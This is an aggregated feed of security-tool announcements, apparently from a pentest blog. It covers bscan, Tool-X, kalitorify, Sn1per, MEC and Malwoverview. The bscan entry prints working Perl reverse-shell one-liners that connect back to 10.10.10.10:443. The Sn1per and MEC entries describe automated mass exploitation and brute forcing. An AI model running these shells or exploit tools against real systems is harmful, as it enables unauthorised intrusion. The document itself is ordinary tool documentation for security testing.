Bscan – An Asynchronous Target Enumeration Tool

Synopsis

bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation

bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.

Download the latest packaged version from PyPI:

    pip install bscan

Or get the bleeding-edge version from version control:

    pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage

bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:

    $ bscan \
    >   --max-concurrency 3 \
    >   --patterns [Mm]icrosoft \
    >   --status-interval 10 \
    >   --verbose-status \
    >   scanme.nmap.org

What's going on here?

- --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
- --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
- --status-interval 10 tells bscan to print runtime status updates every 10 seconds
- --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
- scanme.nmap.org is the host upon which we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:

- patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
- required-programs.txt specifies the installed programs that bscan plans on using
- port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
- service-scans.toml defines the scans to be run on the target(s) on a per-service basis

Detailed Options

Here's what you should see when running bscan --help:

    usage: bscan [OPTIONS] targets

    [bscan ASCII-art banner]

    an asynchronous service enumeration tool

    positional arguments:
      targets               the targets and/or networks on which to perform enumeration

    optional arguments:
      -h, --help            show this help message and exit
      --brute-pass-list F   filename of password list to use for brute-forcing
      --brute-user-list F   filename of user list to use for brute-forcing
      --cmd-print-width I   the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80)
      --config-dir D        the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program
      --hard                force overwrite of existing directories
      --max-concurrency I   maximum integer number of subprocesses permitted to be running concurrently (defaults to 20)
      --no-program-check    disable checking the presence of required system programs
      --no-file-check       disable checking the presence of files such as configured wordlists
      --no-service-scans    disable running scans on discovered services
      --output-dir D        the base directory in which to write output files
      --patterns [ [ ...]]  regex patterns to highlight in output text
      --ping-sweep          enable ping sweep filtering of hosts from a network range before running more intensive scans
      --quick-only          whether to only run the quick scan (and not include the thorough scan over all ports)
      --qs-method S         the method for performing the initial TCP port scan; must correspond to a configured port scan
      --status-interval I   integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30)
      --ts-method S         the method for performing the thorough TCP port scan; must correspond to a configured port scan
      --udp                 whether to run UDP scans
      --udp-method S        the method for performing the UDP port scan; must correspond to a configured port scan
      --verbose-status      whether to print verbose runtime status updates, based on frequency specified by `--status-interval` flag
      --version             program version
      --web-word-list F     the wordlist to use for scans

Companion Tools

The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.

bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:

    $ bscan-wordlists --find "*win*"
    /usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
    /usr/share/wordlists/metasploit/sensitive_files_win.txt
    /usr/share/seclists/Passwords/common-passwords-win.txt

Try bscan-wordlists --help to explore other options.

bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:

    $ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
    perl for windows
    perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    perl with /bin/sh
    perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    perl without /bin/sh
    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development

Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):

    # setup the environment
    mkvirtualenv -p $(which python3) bscan-dev
    workon bscan-dev

    # get the deps
    pip install -r dev-requirements.txt

Lint and type-check the project (these are run on Travis, too):

    flake8 . && mypy bscan

When it's time to package a new release:

    # build source and wheel distributions
    python setup.py bdist_wheel sdist

    # run post-build checks
    twine check dist/*

    # upload to PyPI
    twine upload dist/*

Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Tool-X – A Kali Linux Hacking Tool Installer

What is Tool-X?

Tool-X is a Kali Linux hacking tool installer. Tool-X is developed by Rajkumar Dusad. With the help of Tool-X you can install the best hacking tools on rooted or non-rooted Android devices. In Tool-X there are almost 240 hacking tools available for the Termux app and the GNURoot Debian terminal. You can install any tool with a single click. Tool-X is specially made for Termux and the GNURoot Debian Terminal. Now Tool-X is also available for Ubuntu.

How to use?

Type 0 : to install all tools.
Type 1 : to show all available tools, then type the number of the tool which you want to install.
Type 2 : to show the tool categories.
Type 3 : to install an operating system in Termux.
Type 4 : if you want to update Tool-X.
Type 5 : if you want to know about us.
Type x : to exit.

Tool-X is available for: Android, Ubuntu.

How to install in Termux?

Open the Termux app and type the following commands:

    apt update
    pkg install git
    git clone https://github.com/Rajkumrdusad/Tool-X.git
    cd Tool-X
    chmod +x install.aex
    sh install.aex

If that does not work, type ./install.aex instead. Tool-X is now installed. To run Tool-X, type Tool-X from anywhere in your terminal.

How to install in the GNURoot Debian Terminal?

Open the GNURoot Debian app and type the following commands:

    apt update
    apt install git
    cd && git clone https://github.com/Rajkumrdusad/Tool-X.git
    cd Tool-X
    chmod +x install.aex
    sh install.aex

If that does not work, type ./install.aex instead. Tool-X is now installed. To run Tool-X, type Tool-X from anywhere in your terminal. But use this tool only for legal purposes.

How to install in Ubuntu?

    sudo apt-get update
    sudo apt-get install git
    sudo git clone https://github.com/Rajkumrdusad/Tool-X.git
    cd Tool-X
    chmod +x install.aex
    sudo sh install.aex

Alternatively, run ./install.aex. Tool-X is now installed. To run Tool-X, type Tool-X from anywhere in your terminal. But use this tool only for legal purposes.

Download Tool-X

Link: http://feedproxy.google.com/~r/PentestTools/~3/JqzGZm7j4JQ/tool-x-kali-linux-hacking-tool-installer.html

Kalitorify – Transparent Proxy Through Tor For Kali Linux OS

kalitorify is a shell script for Kali Linux which uses iptables settings for a transparent proxy through Tor. The program also allows you to perform various checks, like checking the external IP or whether Tor has been configured correctly.

What is a Transparent Proxy?

Also known as an intercepting proxy, inline proxy, or forced proxy, a transparent proxy intercepts normal communication at the network layer without requiring any special client configuration. Clients need not be aware of the existence of the proxy. A transparent proxy is normally located between the client and the Internet, with the proxy performing some of the functions of a gateway or router.

Strictly speaking, with kalitorify you can redirect all traffic of your Kali Linux operating system through Tor.

In the Tor project wiki you will find an explanation of what the "transparent proxy through Tor" is and of the related settings.

Recommendations

kalitorify is produced independently from the Tor anonymity software and carries no guarantee from the Tor Project about quality, suitability or anything else. Please read these documents to learn how to use the Tor network safely:

- Tor General FAQ
- Whonix Do Not recommendations

Install

Install dependencies:

    sudo apt update && sudo apt full-upgrade -y
    sudo apt install tor -y

Install kalitorify and reboot:

    git clone https://github.com/brainfucksec/kalitorify
    cd kalitorify/
    sudo make install
    sudo reboot

Usage

    kalitorify [option]

Options

    -t, --tor         start transparent proxy through tor
    -c, --clearnet    reset iptables and return to clearnet navigation
    -s, --status      check status of program and services
    -i, --ipinfo      show public IP
    -r, --restart     restart tor service and change IP

Download Kalitorify

Link: http://feedproxy.google.com/~r/PentestTools/~3/iaWI5yDUmTg/kalitorify-transparent-proxy-through.html

Defend against Brute Force Attack with Fail2ban

Daily we hear news related to cybercrime, like some malicious users or bots having successfully defaced a publicly accessible website or some service. As we always try to explain through our articles, such activities become possible when a system is weakly configured or misconfigured. Therefore, it is important to build some…
The post Defend against Brute Force Attack with Fail2ban appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/defend-against-brute-force-attack-with-fail2ban/

Deep Explorer – Tool Which Purpose Is The Search Of Hidden Services In Tor Network, Using Ahmia Browser And Crawling The Links Obtained

Dependencies

    pip3 install -r requirements.txt

You should also have Tor installed.

Usage

    python3 deepexplorer.py STRING_TO_SEARCH NUMBER_OF_RESULTS TYPE_OF_CRAWL

Examples:

    python3 deepexplorer.py "legal thing" 40 default legal

(will crawl if the results obtained in the browser do not reach 40; the script will also show links which have the "legal" string in their HTML, like the intext dork in Google)

    python3 deepexplorer.py "ilegal thing" 30 all dni

(will crawl every link obtained in the browser until it reaches 30; the script will also show links which have the "dni" string in their HTML, like the intext dork in Google)

    python3 deepexplorer.py "legal thing" 30 none

(do not crawl, only obtain links from the browser)

About

Deep Explorer is a tool designed to search (any)thing in a few seconds.

Any idea, failure etc., please report to Telegram: blueudp

results.txt contains the results obtained in the previous search.

Tested in ParrotOS and Kali Linux 2.0.

Types of Errors

Error importing... -> You should try a manual pip install of the package
Error connecting to server -> Can't connect to the Ahmia browser
If Deep Explorer cannot execute service ..., do it manually; Deep Explorer checks the Tor instance at the beginning, so it will skip that part

Contact

Name: Eduardo Pérez-Malumbres
Telegram: @blueudp
Twitter: https://twitter.com/blueudp

Download Deep-Explorer

Link: http://feedproxy.google.com/~r/PentestTools/~3/Uky3GEJ7r8k/deep-explorer-tool-which-purpose-is.html

MEC v1.4.0 – Mass Exploit Console

massExploitConsole

A collection of hacking tools with a CLI UI.

Disclaimer

Please use this tool only on authorized systems; I'm not responsible for any damage caused by users who ignore my warning.
Exploits are adapted from other sources; please refer to their author info.
Please note, due to my limited programming experience (it's my first Python project), you can expect some silly bugs.

Features

- an easy-to-use cli ui
- execute any adapted exploits with process-level concurrency
- some built-in exploits (automated)
- hide your ip addr using proxychains4 and ss-proxy (built-in)
- zoomeye host scan (10 threads)
- a simple baidu crawler (multi-threaded)
- censys host scan

Getting started

    git clone https://github.com/jm33-m0/massExpConsole.git && cd massExpConsole && ./install.py

When installing PyPI deps, apt-get install libncurses5-dev (for Debian-based distros) might be needed.

Now you should be good to go (if not, please report missing deps here).

Type the proxy command to run a pre-configured Shadowsocks socks5 proxy in the background; vim ./data/ss.json to edit the proxy config. ss-proxy exits with mec.py.

Requirements

- GNU/Linux, WSL, MacOS (not tested); fully tested under Arch Linux, Kali Linux (Rolling, 2018), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)
- Python 3.5 or later (or something might go wrong, https://github.com/jm33-m0/massExpConsole/issues/7#issuecomment-305962655)
- proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)
- Java is required when using Java deserialization exploits; you might want to install openjdk-8-jre if you haven't installed it yet
- note that you have to install all the deps of your exploits or tools as well

Usage

Just run mec.py; if it complains about missing modules, install them.

If you want to add your own exploit script (or binary file, whatever):

- cd exploits, mkdir a directory for it; your exploit should take the last argument passed to it as its target; dig into mec.py to know more
- chmod +x <exploit> to make sure it can be executed by the current user
- use the attack command, then m to select your custom exploit

Type help in the console to see all available features.

zoomeye requires a valid user account config file zoomeye.conf

Download MEC

Link: http://www.kitploit.com/2018/12/mec-v140-mass-exploit-console.html

Sn1per v6.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:

- Professional reporting interface
- Slideshow for all gathered screenshots
- Searchable and sortable DNS, IP and open port database
- Categorized host reports
- Quick links to online recon tools and Google hacking queries
- Personalized notes field for each host

DEMO VIDEO:

SN1PER COMMUNITY FEATURES:

- Automatically collects basic recon (ie. whois, ping, DNS, etc.)
- Automatically launches Google hacking queries against a target domain
- Automatically enumerates open ports via NMap port scanning
- Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
- Automatically checks for sub-domain hijacking
- Automatically runs targeted NMap scripts against open ports
- Automatically runs targeted Metasploit scan and exploit modules
- Automatically scans all web applications for common vulnerabilities
- Automatically brute forces ALL open services
- Automatically tests for anonymous FTP access
- Automatically runs WPScan, Arachni and Nikto for all web services
- Automatically enumerates NFS shares
- Automatically tests for anonymous LDAP access
- Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
- Automatically enumerates SNMP community strings, services and users
- Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
- Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
- Automatically tests for open X11 servers
- Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
- Performs high level enumeration of multiple hosts and subnets
- Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
- Automatically gathers screenshots of all web sites
- Create individual workspaces to store all scan output

AUTO-PWN:

- Drupal Drupalgedon2 RCE CVE-2018-7600
- GPON Router RCE CVE-2018-10561
- Apache Struts 2 RCE CVE-2017-5638
- Apache Struts 2 RCE CVE-2017-9805
- Apache Jakarta RCE CVE-2017-5638
- Shellshock GNU Bash RCE CVE-2014-6271
- HeartBleed OpenSSL Detection CVE-2014-0160
- Default Apache Tomcat Creds CVE-2009-3843
- MS Windows SMB RCE MS08-067
- Webmin File Disclosure CVE-2006-3392
- Anonymous FTP Access
- PHPMyAdmin Backdoor RCE
- PHPMyAdmin Auth Bypass
- JBoss Java De-Serialization RCEs

KALI LINUX INSTALL:

    ./install.sh

DOCKER INSTALL:

Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/

Example usage:

    $ docker pull menzo/sn1per-docker
    $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:

[*] NORMAL MODE
    sniper -t|--target <TARGET>

[*] NORMAL MODE + OSINT + RECON
    sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
    sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
    sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
    sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
    sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
    sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
    sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
    sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
    sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
    sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
    sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
    sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
    sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
    sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
    sniper -u|--update

MODES:

NORMAL: Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.
STEALTH: Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts and IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
NUKE: Launches a full audit of multiple hosts specified in a text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
UPDATE: Checks for updates and upgrades all components used by sniper.
REIMPORT: Reimports all workspace files into Metasploit and reproduces all reports.
RELOAD: Reloads the master workspace report.

SAMPLE REPORT:

https://gist.github.com/1N3/8214ec2da2c91691bcbc

Download Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/RLWB_3_Wk9M/sn1per-v60-automated-pentest-framework.html

Kali Linux 2018.4 Release – Penetration Testing and Ethical Hacking Linux Distribution

Welcome to our fourth and final release of 2018, Kali Linux 2018.4, which is available for immediate download. This release brings the kernel up to version 4.18.10, fixes numerous bugs, includes many updated packages, and adds a very experimental 64-bit Raspberry Pi 3 image.

New Tools and Tool Upgrades

Wireguard is a powerful and easy to configure VPN solution that eliminates many of the headaches one typically encounters setting up VPNs. Check out the Wireguard post for more details on this great addition.

Kali Linux 2018.4 also includes updated packages for Burp Suite, Patator, Gobuster, Binwalk, Faraday, Fern-Wifi-Cracker, RSMangler, theHarvester, wpscan, and more. For the complete list of updates, fixes, and additions, please refer to the Kali Bug Tracker Changelog.

64-bit Raspberry Pi 3

A very experimental Raspberry Pi 3 image that supports 64-bit mode has been created. Please note that this is a beta image, so if you discover anything that isn't working, please alert us on the bug tracker.

Ensuring your Installation is Updated

To double check your version, first make sure your Kali package repositories are correct.

    root@kali:~# cat /etc/apt/sources.list
    deb http://http.kali.org/kali kali-rolling main non-free contrib

Then after running 'apt -y full-upgrade', you may require a 'reboot' before checking:

    root@kali:~# grep VERSION /etc/os-release
    VERSION="2018.4"
    VERSION_ID="2018.4"
    root@kali:~#
    root@kali:~# uname -a
    Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux

If you come across any bugs in Kali, please open a report on our bug tracker. We'll never be able to fix what we don't know about.

Download Kali Linux 2018.4

If you would like to check out this latest and greatest Kali release, you can find download links for ISOs and Torrents on the Kali Downloads page along with links to the Offensive Security virtual machine and ARM images, which have also been updated to 2018.4. If you already have a Kali installation you're happy with, you can easily upgrade in place as follows.

    root@kali:~# apt update && apt -y full-upgrade

Download Kali Linux 2018.4

Link: http://feedproxy.google.com/~r/PentestTools/~3/L9M1Xv19iKQ/kali-linux-20184-release-penetration.html

imR0T – Send A Message To Your Whatsapp Contact And Protect Your Text By Encrypting And Decrypting (ROT13)

imR0T: Send a quick message with simple text encryption to your WhatsApp contact and protect your text by encrypting and decrypting, basically in ROT13 with a new multi-encryption algorithm based on ASCII and symbol substitution.

How To Use

It's simple:

    # Clone this repository
    git clone https://github.com/Screetsec/imR0T.git

    # Go into the repository
    cd imR0T

    # Permission access
    chmod +x imR0T

    # Run the app
    ./imR0T

Command Line

help: A standard command displaying help.

    imR0T╺─╸[ cli ] > help
    |
    |_ Options:[arguments]
       help        |:| show this message
       show        |:| show all modules from this tool
       list style  |:| show list style
       use         |:| use a module, ex : use [ID]
       options     |:| show module options
       run         |:| Execute the module
       set         |:| Set a value
       back        |:| Back to main
       clear       |:| Clear window
       ls          |:| list directory content
       cat         |:| read file/standard input
       pwd         |:| print name of current/working directory
       exit        |:| Exit program

Configuration

Before using the feature that sends a message to your WhatsApp contact with text encryption, you must configure the file conf/whatsapp.conf and add your API key:

    # Getting API :
    # Register in here https://www.apiwha.com/
    # Use your mail or temp mail :P
    # Setup API KEY
    # Example :
    # - api="CA6DSQ3CLPC6FCQ3CLPC6F"
    api=""

Demo Video

Download imR0T

Link: http://feedproxy.google.com/~r/PentestTools/~3/xr9d3A7N8RI/imr0t-send-message-to-your-whatsapp.html

Malwoverview – Tool To Perform An Initial And Quick Triage On Either A Directory Containing Malware Samples Or A Specific Malware Sample

Malwoverview.py is a simple tool to perform an initial and quick triage on a directory containing malware samples (not zipped).

This tool aims to:

1. Determine similar executable malware samples (PE/PE+) according to the import table (imphash) and group them by different colors (pay attention to the second column of the output). Thus, colors matter!
2. Determine whether executable malware samples are packed or not packed according to the following rules:
   2a. Two or more sections with Entropy > 7.0 or < 1.0 ==> Packed.
   2b. Only one section with Entropy > 7.0, or two sections with SizeOfRawData ==> Likely packed.
   2c. No section with Entropy > 7.0 or SizeOfRawData ==> not packed.
3. Determine whether the malware samples contain an overlay.
4. Determine the .text section entropy. Malwoverview.py only examines PE/PE+ files, skipping everything else.
5. Check each malware sample against Virus Total.

REQUIREMENTS

This tool was tested on a Kali Linux 2018 system. Therefore, it will be necessary to install:

Python version 2.7.x:

    $ apt-get install python

python-magic. To install the python-magic package you can execute the following command:

    $ pip install python-magic

Or compile it from the GitHub repository:

    $ git clone https://github.com/ahupp/python-magic
    $ cd python-magic/
    $ python setup.py build
    $ python setup.py install

As there are serious problems with two versions of the python-magic package existing, my recommendation is to install it from GitHub (second procedure above) and copy the magic.py file to the SAME directory as the malwoverview tool.

The pefile and colorama packages:

    $ pip install pefile
    $ pip install colorama
    $ pip install simple-json
    $ pip install requests

USAGE

To use malwoverview, execute the command as shown below:

    $ python malwoverview -d <directory> -f <fullpath> -i <0|1> -b <0|1> -v <0|1> -a <0|1> -p <0|1> -s <0|1> -x <0|1>

where:

- -d <directory> is the folder containing malware samples.
- -f <fullpath> specifies the full path to a file. Shows general information about the file (any filetype).
- (optional) -b 1 forces a light gray background (for black terminals). It does not work with the -f option.
- (optional) -i 1 shows imports and exports (used with the -f option).
- (optional) -x 1 extracts the overlay (used with the -f option).
- (optional) -v 1 queries the Virus Total database for positives and totals (any filetype).
- (optional) -a 1 queries the Hybrid Analysis database for a general report. Thus, you need to edit malwoverview.py and insert your HA API key and respective secret.
- (optional) -s 1 shows antivirus reports from the main players. This option is used with the -f option (any filetype).
- (optional) -p 1 use this option if you have a public Virus Total API. It forces a one minute wait every 4 malware samples, but allows obtaining a complete evaluation of the malware repository.

If you use the Virus Total option, it is necessary to edit malwoverview.py and insert your VT API key. Remember that the public VT API only allows 4 searches per second (as shown in the image above). Therefore, if you are willing to wait some minutes, you can use the -p option, which forces a one minute wait every 4 malware samples, but allows obtaining a complete evaluation of the repository.

*ATTENTION: if the directory contains many malware samples, malwoverview.py could take some time. :)

HISTORY

Version 1.4: This version:
* Adds the -a option for getting the Hybrid Analysis summary report.
* Adds the -i option for listing imported and exported functions. Therefore, the imported/exported function report was decoupled into a separate option.

Version 1.3: This version:
* Adds the -p option for the public Virus Total API.

Version 1.2: This version includes:
* evaluates a single file (any filetype)
* shows PE sections.
* shows imported functions.
* shows exported functions.
* extracts overlay.
* shows AV report from the main players (any filetype).

Version 1.1: This version:
* Adds the VT checking feature.

Version 1.0: Malwoverview is a tool to perform a first triage of malware samples in a directory and group them according to their import functions (imphash) using colors. This version:
* Shows the imphash information classified by color.
* Checks whether malware samples are packed.
* Checks whether malware samples have overlay.
* Shows the entropy of the malware samples.

Screenshots

Important aspect: Malwoverview does NOT submit samples to VT. It submits only hashes, so respecting Non-Disclosure Agreements (NDAs).

Download Malwoverview

Link: http://feedproxy.google.com/~r/PentestTools/~3/zvjsmu5dk5M/malwoverview-tool-to-perform-initial.html